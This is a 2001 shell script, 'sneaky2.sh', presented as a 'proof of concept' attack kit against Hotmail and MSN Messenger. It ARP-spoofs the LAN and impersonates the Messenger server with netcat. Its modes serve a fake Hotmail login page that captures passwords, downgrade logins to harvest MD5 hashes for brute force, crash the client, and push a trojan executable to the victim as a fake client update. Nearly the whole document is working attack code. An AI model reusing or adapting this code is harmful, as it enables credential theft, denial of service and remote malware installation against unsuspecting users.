📄 sneaky2.sh
#!/bin/sh## //# // neaky.sh # \\# \\ wiss army knife for Hotmail/Messenger# // # //### "Spoofing/brute force/misconception/unexpected input Class Attack"## ## AUTHOR: Gregory Duchemin ( Aka c3rb3r )## COMPANY: NEUROCOM CANADA# 1001 bd Maisonneuve Ouest, suite 200# H3A 3C8 Montreal (Quebec) CANADA# gdn@neurocom.com# 514 908 6800# http://www.securite-internet.com## DATE: January 2001## PURPOSE: Will spoof Hotmail/messenger server to recover user # hotmail/password, crash messenger client, remotely inject and # execute malicious exe on the victim host.## NOTE: U will have to send arp responses by broadcasting your MAC/GATEWAY # to the limited broadcast address/IP Broadcast # otherwise u can still try it on your own gateway or from your provider ;)# As a last resort, u can temporalily modify your DNS entry for # messenger servers.## REQUIRED: This sploit needs an "arptool" like software and a local www server to work properly.# =================================================================############################################################################################ THIS SCRIPT IS JUST A PROOF OF CONCEPT AND SHOULD NOT BE USED FOR ANY ILLEGAL ACTIVITY ########################################################################################### export delay=100000#################################### Things to be configured first#################################### IP address of messenger server to spoof# It change from client to client, check it by sniffing or u can always # assign as many virtual ip as there are messenger server IP. 
export messenger="64.4.13.56"# HTTP document rootexport cgiroot="/usr/local/apache/cgi-bin/"export httproot="/usr/local/apache/htdocs/"# Malicious exe locationexport malicious_path="/tmp/"export malicious="mmssetup.exe"# Access URI : stupid garbage to hide the real urlexport relogin="loginid=121EAAAAFBBDC2739121+CooKie=1212198AFEDCDFFF+TimeoftheDAY=231212+PASS=+LOGIN=+BIG-Brother"# Messenger PORTexport PORT=1863# real IP of our fake hotmail server, this host ipexport MYIP="192.168.10.17"# number of non read messages,# need at least 1 to stimulate requests from the client export nrmsg="10"#number of non read folders export nrfld="0"#path/filename where to store hotmail passwordexport PASSWORD_HERE="/tmp/hotmail-pass"#path to reach your arp spoofer/flooderexport ARP="arptool"########################################### End of configuration options##########################################handl3r(){echoecho "Job finished, hope everything is ok...."echo "see ./log for details."echohtml_cleanersynckillall "$ARP"exit}usage(){echoecho -e "Usage: $0 [MODE] \n"echoecho "MODE: 1 / Hotmail web spoof for clear password recovery."echo " 2 / Hotmail weakenned MD5 password Hash recovery for bruteforce."echo " 3 / Messenger Remote CrAsh."echo " 4 / Remote injection of malicious exe."echoechoecho "NOTE: Don't forget to customize settings in the script (the first lines)."echo "NOTE2: This proggy needs a local www and arptool or something similar to broadcast arp response to your LAN. 
I don't have lust to reinvente the wheel."echo "NOTE3: USE IT ONLY FOR EDUCATIONNAL PURPOSE, NOTHING ILLEGAL PLEASE !"echoecho "DETAILS: attack 1/ will trojanize victim to get back a plain password."echo " attack 2/ will ask for weak md5 hash."echo " attack 3/ will crash the client.(exploitable b.overflow ?)"echo " attack 4/ will upload a fake update, naively installed."echoecho "have a nice day"echo " Gregory Duchemin ( c3rb3r@hotmail.com )"echo echo} if [ $# -lt 1 ]; thenusageexitfiexport MODE="$1"if [ $MODE -gt 4 ]; thenusageexitfi# IP_forwarding should be set to avoid detection/suspicion.sysctl -w net.ipv4.conf.all.forwarding=1if [ $? -eq 1 ]; thenusageechoechoecho "Warning: Unable to set ip_forwarding (not a Linux ?), please configure the script."echoechofi# automatic configuration of arp broadcasting/spoofing over the Lan.echoecho -n "ARP broadcast : "$ARP -c 1 -s $(ifconfig -a | grep "HWaddr" | awk '{print $5}' | egrep -n '^[0-9]+' | egrep '^1:'| sed '1,$s/^1://') FF:FF:FF:FF:FF:FF $(netstat -rn | grep "UG" | awk '{print $2}' ) $(ifconfig -a | grep "inet" | awk -F ':' '{print $3}' | awk '{print $1}'| egrep -n '^[0-9]+' | egrep '^1:' | awk -F ':' '{print $2}') 2 2>&1 > /dev/null &if [ $? -eq 1 ]; thenusageechoechoecho "Error: I need something like arptool to do the job.. even if u have something else but similar, please do the appropriate modifications in the script."echoechoexitfiecho "OK"export TID=$!if [ $MODE = "2" ]; thenechoecho "Weak MD5 hashes will be stored in /tmp/md5-password"echoecho fiif [ $MODE = "1" ]; then echoecho "Clear Hotmail/MSN passwords will be stored in /tmp/clear-password"echoechofiif [ $MODE = "3" ]; then echoecho "Remote client may suddenly die...."echoechofiif [ $MODE = "4" ]; thenif [ ! 
-f $malicious_path"/$malicious" ]; thenechoecho "Please first define the trojan (in the configuration section)"echoechoexit 0fiechoecho "Remote Injection of junky data."echoechofitrap handl3r SIGINTfunction html_builder(){echo -n -e "#!/bin/sh\ncat << __MYGIFT__Content-type:text/html\n<html><!--JUST A PROOF OF CONCEPT, USE IT FOR EDUCATIONNAL PURPOSES--><body><div align=left><div id=layer1 style=\"width:100%; height:100%; position:absolute; left:0px; top:0px; z-index:0;\"><div id=layer2 style=\"position:absolute; left:40; top:0; z-index:0;\"> <form name=\"passwordform\" action=\"http://$MYIP/response.html\" method=\"GET\" AUTOCOMPLETE=OFF ><table cellpadding=0 cellspacing=0 border=0 width=590><tr><td colspan=2><table cellpadding=0 cellspacing=0 border=0 width=100%><tr><td><a href=\"javascript:void()\" target=_top><img src=\"http://c3rber.multimania.com/horsemail.gif\" width=468 height=60 border=0 alt=""></a></td><td align=CENTER nowrap><img src=\"http://c3rber.multimania.com/pass.gif\" width=140 height=44 border=0 alt=\"Find Out More About Passport\"><br><a href=javascript:void() target=_top><font class=f size=2>Help</font></a><br></td></tr></table></td></tr><tr><td bgcolor=#cccc99><font class=f size=4><b>Please re-enter your password at your own risk</b></font></td><td valign=top><table width=100% border=0 cellspacing=0 cellpadding=0><tr><td height=1 bgcolor=#cccc99></td></tr></table></td></tr><tr><td height=6></td></tr><tr valign=top><td><font class=s></font></td><td rowspan=4><font class=s></font></font></td></tr><tr><td><font class=f size=2><b><" > $cgiroot"/$relogin"cat /tmp/.mail >> $cgiroot"/$relogin"echo -n -e "></b></font><input type=hidden name=\"domain&IDcookie=123515261725ABFFCDEEE&key-id=&passvalue=&domain-name=\" value=hotmail.com><table cellpadding=0 cellspacing=0><tr><td height=35 valign=middle><font class=sbd>Password</font> </td><td><input type=password name=PASSWORD size=16 maxlength=16></td><td width=22 valign=\"middle\" align=\"center\"> 
</td><td><input type=\"submit\" name=\"enter\" value=\"Sign in\"></td></tr><tr><td></td><td colspan=\"2\"><font class=\"f\" size=2><b><a href=\"javascript:void()\" target=\"_top\">ChangeUser</a></b></font></td></tr></table></form></table><table cellpadding=0 cellspacing=0 border=0 width=590><tr><td> C3rb3r © 2001 Hotmail/Messenger/MSIE vulnerabilities proof of concept. <a href=\"javascript:void()\">H0rsemail TERMS OF USE and NOTICES</a> <a href=\"javascript:void()\"><font class=\"s\">untrusted Privacy Statement</font></a></td></tr></table></div><p align=center><img src=\"http://c3rber.multimania.com/hotmail.jpg\" width=1280 height=950 border=0 ></div></div></body></html> \n__MYGIFT__\n\n">> $cgiroot"/$relogin"chmod a+x $cgiroot"/$relogin"#echo "This is the false update for messenger." > $httproot"mmssetup.exe"echo "<html><br><br><br><center>Thanx for your participation.</center><br><br>C3rb3r.</html>" > $httproot"response.html"}html_cleaner(){rm -f $cgiroot"/$relogin"mkdir -p $httproot"$relogin"chmod a+rwx $httproot"$relogin"cp -f $malicious $httproot"$relogin""/mmssetup.exe"rm -f $httproot"response.html"}#IP ALIAS with messenger IPechoecho -n "Interface configuration : "ifconfig eth0:0 inet $messengerecho "OK"echoecho "Waiting for a client n0w...."echo# things are getting serious now, this is the messenger automate:export flag="0"cat /dev/null > ./tracewhile truedosync(usleep $delay while truedoexport parsed="$( egrep -e '(VER [0-9]{1,} ([A-Z0-9]){3,})|OUT|(INF [0-9]{1,})|(USR [0-9]{1,})|(SYN [0-9]{1,} [0-9]{1,})|(CVR [0-9]{1,})|(CHG [0-9]{1,})|(URL [0-9]{1,})' ./log)"if [ "$parsed" != "" ]; thensyncexport request=$(echo $parsed | awk '{print $1}')export num=$(echo $parsed | awk '{print $2}')case "$request" inVER)usleep $delay cat ./log | sed -e "s/VER/ver/" > ./logecho -e "VER $num MSNP5 MSNP4 CVR0\r" syncusleep $delay ;;INF)cat ./log | sed -e "s/INF/inf/" > ./logexport new=$(echo $num | sed -e 's/.$/ /')echo -e "INF $new""MD5\r" usleep $delay ;;USR) cat ./log | 
sed -e "s/USR/usr/" > ./logexport ttype=$(echo $parsed | awk '{print $4}')if [ "$ttype" = "I" ]; thenexport email=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $5}')echo "$email" > /tmp/.mailhtml_builderrm -f /tmp/.mailif [ ! $MODE = "2" ]; thenecho -e "USR $num MD5 S "$(date "+%s")"\r"elseecho -e "USR $num MD5 S \r"fielseexport password=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $5}')if [ $MODE = "2" ]; thenecho -e "910 $num \r" usleep $delay echo -e "\n\nHotmail password (MD5 hash) for $email is $password\n\n" >> /tmp/md5-passwordsyncexit fiecho -e "USR $num OK $email $email\r" fiusleep $delay;;SYN)export syn=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $3}')cat ./log | sed -e "s/SYN/syn/" > ./logexport time=$(date "+%s") echo -e "MSG Hotmail Hotmail 331\r\nMIME-Versio\n: 1.0\r\nContent-Type: text/x-msmsgspro\file; charset=UTF-8\r\nLoginTime: $time\\r\nEmailEnabled: 1\r\nMemberIdHigh: 84\224\r\nMemberIdLow: 1114357868\r\nlang_pre\ference: 1033\r\npreferredEmail: \r\ncount\ry: CA\r\nPostalCode: \r\nGender: M\r\nAge:\ 60\r\nsid: 507\r\nkv: 2\r\nMSPAuth: \2AAAAAAA\AD1ZbiLXW3pZ1*ag4qqsgrQYBo1M3vAfU6971a\t3erLcBGzQ$$\r\n\r"usleep $delay echo -e "SYN $num $syn\r"usleep $delay sync ;;CVR)export version=$(echo $parsed | awk '{print $8}')cat ./log | sed -e "s/CVR/cvr/" > ./log if [ "$flag" = "0" ]; thenif [ $MODE = "4" ]; thenecho -e "CVR $num 12.666.666 12.666.666 9.0.0863 h\ttp://$MYIP\/$relogin""/$malicious http://$MYIP/$relogin""/$malicious\\r"else echo -e "CVR $num $version $version 1.0.0863 h\ttp://$MYIP/\/mmssetup.exe http://$MYIP\/\r" fiexport flag="1"else if [ "$flag" = "1" ]; thenecho -e "$chg"echo -e "MSG Hotmail Hotmail 223\r\nMIME-Versio\n: 1.0\r\nContent-Type: text/x-msmsgsini\tialemailnotification; charset=UTF-8\r\n\\r\nInbox-Unread: $nrmsg \r\nFolders-Unread: $nrfld\\r\nInbox-URL: /$relogin""\r\nFolders\-URL: /$relogin""\r\nGet-URL: http\//$MYIP\r\n\r"if [ $MODE = "4" ]; thenecho -e "CVR $num 12.666.666 12.666.666 9.0.0863 
h\ttp://$MYIP/\mmssetup.exe http://$MYIP/\r"elseecho -e "CVR $num $version $version 1.0.0863 h\ttp://download.microsoft.com/download/\msnmessenger/Patch/2.1/Win98/EN-US/msg\strst.dll http://messenger.msn.com/\r"fiexport flag="3"echo -e "BPR $num C3rb3r@hotmail.com PHH\r"echo -e "BPR $num C3rb3r@hotmail.com PHW\r\nBPR $num\ c3rb3r@hotmail.com PHM\r\nBPR $num c3rb3r@h\otmail.com MOB N\r"usleep $delayif [ $MODE = "3" ]; thenecho -e "ADD 0 AL Crash Crash \r"usleep $delayexit 0fififiusleep $delay ;;CHG)export chg=$( echo "$parsed"| egrep "CHG")cat ./log | sed -e "s/CHG/chg/" > ./logusleep $delay ;;OUT)html_cleanerexit 0;;URL)cat ./log | sed -e "s/URL/url/" > ./logecho -e "URL $num /www.hotmail.com http://"$MYIP"/c/s.dll/"$relogin 0"\\r"usleep $delay ;;esac fidone)| nc -w 5 -s $messenger -n -l -p $PORT > ./log 2>/dev/null egrep -e 'OUT' ./log > /dev/nullif [ ! $? -eq 1 ]; thenechoecho "Victim has signed out...."echo "see ./log for details."echofidone